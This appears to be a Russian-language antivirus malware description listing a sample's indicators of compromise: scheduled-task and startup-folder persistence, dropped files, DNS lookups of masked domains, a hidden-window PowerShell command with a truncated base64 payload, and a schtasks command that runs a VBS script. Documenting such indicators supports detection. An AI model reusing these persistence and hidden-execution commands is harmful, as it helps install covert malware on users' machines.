Техническая информация
- <SYSTEM32>\tasks\windowsapplicationservice
- %APPDATA%\microsoft\windows\start menu\programs\startup\windowsapplicationservice.lnk
- C:\users\public\libraries\thumbcache_64.db
- C:\users\public\libraries\thumbcache_64.db
- DNS ASK ge##.###gmonthairsalon.com
- DNS ASK ag####kxmdqx.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHpzY2RqdWogPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoICR6c2...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden -c $a=[string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'JHpzY2RqdWogPSAkZW52OlBVQkxJQyArICJcTGlicmFyaWVzIgppZiAoLW5vdCAoVGVzdC1QYXRoICR6c2...
- '<SYSTEM32>\schtasks.exe' /create /TN WindowsApplicationService /sc DAILY /st 00:00 /f /RI 17 /du 23:59 /TR C:\Users\Public\Libraries\WindowsIndexingService.vbs
- '<SYSTEM32>\taskeng.exe' {46ED820E-3D00-4861-A57F-EB70FE480B9C} S-1-5-21-1960123792-2022915161-3775307078-1001:mchagqwuvlhr\user:Interactive:[1]